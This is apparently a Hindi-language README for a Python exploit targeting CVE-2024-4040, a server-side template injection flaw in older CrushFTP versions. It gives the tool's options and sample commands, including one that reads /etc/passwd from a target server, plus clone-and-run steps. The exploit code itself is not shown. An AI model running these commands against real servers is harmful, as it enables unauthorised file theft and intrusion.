
सर्वर साइड टेम्पलेट इंजेक्शन कमजोरी CrushFTP में सभी संस्करणों में 10.7.1 और 11.1.0 से पहले सभी प्लेटफार्मों पर अनधिकृत रिमोट हमलावरों को VFS सैंडबॉक्स के बाहर फाइलसिस्टम से फाइलें पढ़ने, प्रशासनिक पहुंच प्राप्त करने के लिए प्रमाणीकरण को बायपास करने, और सर्वर पर रिमोट कोड निष्पादन करने की अनुमति देती है।
CVE-2024-4040 के लिए Python एक्सप्लॉइट
CrushFTP के सभी संस्करणों में 10.7.1 और 11.1.0 से पहले के संस्करणों में मौजूद एक सर्वर-साइड टेम्पलेट इंजेक्शन भेद्यता, सभी प्लेटफॉर्मों पर अप्रमाणित रिमोट हमलावरों को VFS सैंडबॉक्स के बाहर फाइलसिस्टम से फाइलें पढ़ने, प्रमाणीकरण को बायपास करके प्रशासनिक पहुंच प्राप्त करने और सर्वर पर रिमोट कोड निष्पादन करने की अनुमति देती है।
-h --help यह स्क्रीन दिखाएँ।
-t --target लक्ष्य URL निर्दिष्ट करें
-f --file शामिल करने के लिए फ़ाइल निर्दिष्ट करें
केवल भेद्यता की जाँच करें: exploit.py -t http://10.10.1.23:8080
/etc/passwd शामिल करें: exploit.py -t http://10.10.1.23:8080 -f /etc/passwd
git clone https://github.com/1ncendium/CVE-2024-4040.git
cd CVE-2024-4040
python3 exploit.py -t http://target:8080